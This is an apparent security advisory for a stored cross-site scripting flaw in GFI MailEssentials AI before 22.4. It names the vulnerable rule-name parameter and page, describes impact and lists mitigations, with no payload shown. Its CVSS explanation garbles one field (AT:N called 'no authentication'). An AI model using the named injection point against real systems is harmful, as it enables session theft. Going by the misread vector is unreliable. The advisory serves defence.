CVE-2026-23604 is a stored cross-site scripting vulnerability classified under CWE-79, affecting GFI Software's MailEssentials AI product versions prior to 22.4. The flaw exists in the Keyword Filtering rule creation workflow, specifically in the ctl00$ContentPlaceHolder1$pv1$TXB_RuleName parameter of the /MailEssentials/pages/MailSecurity/contentchecking.aspx page. An authenticated user with at least limited privileges can inject arbitrary HTML or JavaScript code into this parameter. Because the input is stored without proper neutralization, it is later rendered in the management interface, allowing the malicious script to execute in the context of any logged-in user who views the affected page. This can lead to theft of session cookies, unauthorized actions, or privilege escalation within the MailEssentials AI management console. The vulnerability requires authentication and some user interaction but does not require high privileges or complex attack vectors. The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), no authentication required (AT:N) but with privileges required (PR:L), user interaction needed (UI:P), and low impact on confidentiality and integrity but no availability impact. No public exploits have been reported yet, but the vulnerability poses a risk to organizations relying on MailEssentials AI for email security filtering. The lack of a patch link suggests that remediation may require updating to version 22.4 or later once available.

The primary impact of this vulnerability is the potential for attackers with authenticated access to execute arbitrary scripts within the management interface of MailEssentials AI. This can lead to session hijacking, allowing attackers to impersonate legitimate administrators and perform unauthorized actions such as modifying email filtering rules, disabling protections, or accessing sensitive configuration data. It may also facilitate privilege escalation if lower-privileged users can leverage the XSS to gain higher privileges. The vulnerability undermines the integrity and confidentiality of the email security management environment, potentially allowing attackers to bypass security controls and compromise the organization's email infrastructure. While the vulnerability does not directly affect availability, the indirect consequences of compromised administrative controls could disrupt email security operations. Organizations worldwide using affected versions are at risk, particularly those with multiple administrators or complex email filtering policies.

To mitigate CVE-2026-23604, organizations should prioritize upgrading GFI MailEssentials AI to version 22.4 or later once the patch is released. In the interim, implement strict input validation and output encoding on the RuleName parameter to prevent injection of HTML or JavaScript. Restrict access to the management interface to trusted administrators only and enforce the principle of least privilege to limit the number of users who can create or modify keyword filtering rules. Employ web application firewalls (WAFs) with custom rules to detect and block suspicious script injection attempts targeting the vulnerable parameter. Monitor logs for unusual activity related to rule creation or management interface access. Educate administrators about the risks of XSS and encourage cautious behavior when interacting with user-generated content in the management console. Finally, consider isolating the management interface within a secure network segment to reduce exposure.